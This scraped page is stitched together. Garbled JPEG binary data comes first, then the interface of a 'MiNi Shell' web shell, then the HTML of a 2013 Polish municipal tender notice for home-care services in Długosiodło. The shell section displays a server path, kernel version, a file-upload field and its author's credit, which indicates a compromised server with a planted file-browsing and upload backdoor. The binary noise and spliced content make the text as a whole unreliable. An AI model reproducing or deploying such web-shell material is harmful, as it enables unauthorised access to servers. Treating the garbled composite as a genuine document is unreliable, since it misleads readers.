JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131211/269577-N-2013.html

<p class="kh_header"><b>Długosiodło: Usługi opiekuńcze na terenie gminy Długosiodło</b><br>
<b>Numer ogłoszenia: 269577 - 2013; data zamieszczenia: 11.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. T. Kościuszki 2, 07-210 Długosiodło, woj. mazowieckie, tel. 29 7412158, faks 297412158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dlugosiodlo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi opiekuńcze na terenie gminy Długosiodło.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług opiekuńczych w tym: pielęgnacyjnych i gospodarczych wchodzących w zakres świadczeń z ustawy o pomocy społecznej z dnia 12 marca 2004 r. (Dz. U. z 2009 r., Nr 175, poz. 1326 z późn. zm.) dla podopiecznych Gminnego Ośrodka Pomocy Społecznej w Długosiodle. Usługi wykonywane będą na terenie gminy Długosiodło w domach podopiecznych Gminnego Ośrodka Pomocy Społecznej uprawnionych do korzystania z tych usług w dni powszednie oraz w soboty, niedziele i święta w okresie od 01 stycznia 2014 r. do 31 grudnia 2016 r.

2. Przez usługi opiekuńcze pielęgnacyjne należy rozumieć pomoc świadczoną osobom leżącym lub mającym poważne trudności z poruszaniem się i samoobsługą oraz wymagającym pomocy z powodu wieku, urazów powypadkowych lub ciężkich i przewlekłych chorób oraz innych, wymagającą znajomości podstawowych zasad i czynności pielęgnacyjnych, zleconych najczęściej przez lekarza.

3. Przez usługi opiekuńcze gospodarcze należy rozumieć pomoc świadczoną osobom mającym trudności związane z samoobsługą, kontaktami z otoczeniem społecznym oraz funkcjonowaniem w środowisku, przede wszystkim ze względu na wiek, urazy powypadkowe lub ciężkie i przewlekłe choroby oraz inne, polegającą na pomocy lub wykonywaniu czynności dnia codziennego.

4. Usługi będą świadczone dla około 15 środowisk, których liczba może ulec zmianie. Ilość usług opiekuńczych określa się na około 8.000 (osiem tysięcy) godzin w skali roku i będzie ją określał Zamawiający w zależności od potrzeb środowiska, w tym:
- usługi opiekuńcze pielęgnacyjne świadczone w dni powszednie - 2.000 godzin,
- usługi opiekuńcze pielęgnacyjne świadczone w soboty, niedziele i święta - 1.000 godzin,
- usługi gospodarcze świadczone wyłącznie w dni powszednie - 5.000 godzin.


5. Zamawiający przewiduje możliwość niewykonania limitu godzin. Zamawiający nie ponosi odpowiedzialności z tytułu zmniejszenia liczby godzin usług w związku z wystąpieniem przyczyn niezależnych od Zamawiającego.

6. Zamawiający wskazuje Wykonawcy osoby kwalifikujące się do przyznania usług opiekuńczych, w tym pielęgnacyjnych i gospodarczych. Zlecenie realizacji usług opiekuńczych, w tym pielęgnacyjnych i gospodarczych na rzecz konkretnej osoby, będzie przekazywane Wykonawcy pisemnie. Będzie nim kopia indywidualnej decyzji administracyjnej, adresowana do podopiecznego. W wyjątkowych sytuacjach dopuszcza się ustne poinformowanie Wykonawcy przez Zamawiającego o rozpoczęciu lub przerwaniu usług, co w terminie późniejszym zostanie potwierdzone przez przekazanie kopii decyzji administracyjnej.

7. Usługi opiekuńcze, w tym: pielęgnacyjne i gospodarcze wykonywane będą w godzinach 8:00 - 20:00 w ciągu całego tygodnia, w tym także w soboty, niedziele i święta. 

8. Wykonawca usług opiekuńczych, w tym: pielęgnacyjnych i gospodarczych:

1) kieruje odpowiedni personel do wykonywania usług określonych decyzją administracyjną do domu podopiecznego;

2) realizuje usługi opiekuńcze, w tym: pielęgnacyjne i gospodarcze zgodnie z ustalonym zakresem i wymiarem;
3) informuje Gminny Ośrodek Pomocy Społecznej o każdej zmianie sytuacji życiowej i zdrowotnej podopiecznego, mającej wpływ na realizację pomocy usługowej w najszybszym możliwym terminie;

4) w przypadku trudności w pobraniu od podopiecznych należności za wykonane usługi opiekuńcze, w tym: pielęgnacyjne i gospodarcze, Wykonawca zobowiązany jest poinformować o tym fakcie Zamawiającego przedstawiając listę, która zawierać powinna niżej wymienione informacje:

1) nazwisko, imię oraz adres podopiecznego
2) kwotę odpłatności podopiecznego za wykonane usługi
3) powód nie wniesienia odpłatności przez podopiecznego

5) Wykonawca zobowiązuje się do przekazywania rozliczenia za każdy miesiąc świadczenia usług do siódmego dnia następnego miesiąca w formie faktury wraz z załącznikiem zawierającym:

a) wykaz imienny osób objętych pomocą w danym miesiącu;
b) liczby zleconych godzin usług w danym miesiącu, dla każdego podopiecznego;
c) łączne zestawienie ilości faktycznie zrealizowanych godzin u podopiecznego i łączną kwotę należności za usługi w danym miesiącu;
d) w rozliczeniu w uwagach Wykonawca zobowiązuje się do uwzględniania wyjaśnień dotyczących przyczyn uniemożliwiających realizację usług u poszczególnych podopiecznych zgodnie z wydaną decyzją administracyjną;
e) zbiorcze zestawienie zrealizowanych godzin usług w miesiącu rozliczeniowym;

6) W szczególnie uzasadnionych przypadkach Zamawiający może wystąpić do Wykonawcy o  wcześniejsze rozliczenie usług wykonanych w danym miesiącu.

7) W sytuacji przedłożenia przez Wykonawcę dokumentów, o których mowa w pkt. 5) sporządzonych nieprawidłowo Zamawiający będzie miał prawo do czasu ich wyjaśnienia, powstrzymać się od wypłacania należnego Wykonawcy wynagrodzenia. 


9. Wykonawca zobowiązuje się do przedstawienia Zamawiającemu za każdy miesiąc karty realizacji usług opiekuńczych pielęgnacyjnych i opiekuńczych gospodarczych z podpisami podopiecznego. Bieżąca karta pracy będzie znajdować się w mieszkaniu podopiecznego, w celu zapewnienia kontroli. Po każdej wizycie opiekunki karta pracy będzie poświadczana przez podopiecznego. Na karcie pracy powinny znaleźć się m.in. informacje o zmianach terminów i godzin usług oraz ich przyczynach, powodach braku realizacji usług, itp.
10. Wykonawca zobowiązany jest wyznaczyć koordynatora, z którym Zamawiający będzie mógł kontaktować się telefonicznie oraz pocztą elektroniczną

11.  Ramowy zakres usług opiekuńczych obejmuje:

1) Usługi pielęgnacyjne:

a) toaleta poranna całego ciała chorego w łóżku;
b) słanie łóżka;
c) zmiana bielizny osobistej i pościelowej;
d) pomoc w czynnościach fizjologicznych;
e) pomoc przy zmianie pozycji chorego w łóżku, stosowanie udogodnień;
f) zapobieganie, pielęgnacja odleżyn i odparzeń;
g) smarowanie i nacieranie miejsc narażonych na ucisk;
h) nacieranie i oklepywanie pleców;
i) stosowanie pielęgnacji według zaleceń lekarza;
j) przeniesienie chorego na wózek inwalidzki;
k) dopajanie, podawanie posiłków;
l) edukacja w zakresie postępowania pielęgnacyjnego (podopiecznego, rodziny);
m) opłacanie wszelkich świadczeń, w tym pobieranie odpłatności od podopiecznego za usługi opiekuńcze pielęgnacyjne zgodnie z decyzją administracyjną;
n) czynności pielęgnacyjne niemowląt i małych dzieci: mycie, kąpiel, karmienie, inne czynności pielęgnacyjne.

2) Usługi gospodarcze: 

a) pomoc podopiecznemu w wykonywaniu zabiegów higienicznych;
b) zakupy w najbliższym sklepie; 
c) przygotowywanie posiłków (także z uwzględnieniem diety);
d) dostarczanie obiadu z punktu gastronomicznego;
e) pomoc przy spożywaniu posiłków;
f) mycie naczyń po posiłku;
g) sprzątanie;
h) drobne pranie;
i) prasowanie;
j) zanoszenie i odbiór odzieży z pralni;
k) przynoszenie węgla i palenie w piecu;
l) przynoszenie wody (jeżeli nie ma jej w domu);
m) wynoszenie nieczystości;
n) realizacja recept;
o) podawanie leków według zaleceń lekarza;
p) opłacanie wszelkich świadczeń, w tym pobieranie odpłatności od podopiecznego za usługi opiekuńcze gospodarcze zgodnie z decyzją administracyjną;
q) załatwianie spraw urzędowych;
r) pomoc w prowadzeniu gospodarstwa domowego;
s) dbanie o kondycję psychoruchową;
t) pomoc w opiece nad dziećmi;
u) inne usługi wykonywane u podopiecznego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia Wykonawcy wybranemu w niniejszym postępowaniu zamówień uzupełniających, o których mowa w art.. 67 ust. 1 pkt 6 ustawy stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.24.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca składający ofertę wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje (dotyczy świadczeń okresowych lub ciągłych) co najmniej 2 usługi o wartości 20 000,00 zł brutto każda, polegające na trwającym minimum 11 miesięcy świadczeniu usług opiekuńczych.
Ocena spełniania tego warunku zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony i podpisany formularz ofertowy, (wg wzoru na zał. nr 1 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowi zał. nr 6 do SIWZ.
Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, za wyjątkiem:
1) zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa, w tym zmiany stawek podatku VAT,
2) zmiany w określeniu stron umowy,
3) zmiany ceny podanej przez wykonawcę, która ulegać będzie waloryzacji jeden raz w roku kalendarzowym w stosunku do ceny umownej (j.w.) uwzględniając średnioroczny wskaźnik wzrostu cen towarów i usług konsumpcyjnych ogółem za rok poprzedni ustalany przez Główny Urząd Statystyczny (opublikowany w Monitorze Polskim).  Pierwsza waloryzacja nastąpi od dnia 01 stycznia 2015 roku, a następna od dnia 01 stycznia 2016 r.
4) zmiany prawa lub wystąpienia innych okoliczności, których nie można było przewidzieć, a które uniemożliwiałyby wykonanie przedmiotu umowy zgodnie z jej treścią i celem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dlugosiodlo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Długosiodło, ul. T. Kościuszki 2, 07 - 210 Długosiodło, I piętro, pokój nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 12:00, miejsce: Urząd Gminy Długosiodło, ul. T. Kościuszki 2, 07 - 210 Długosiodło, I piętro, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com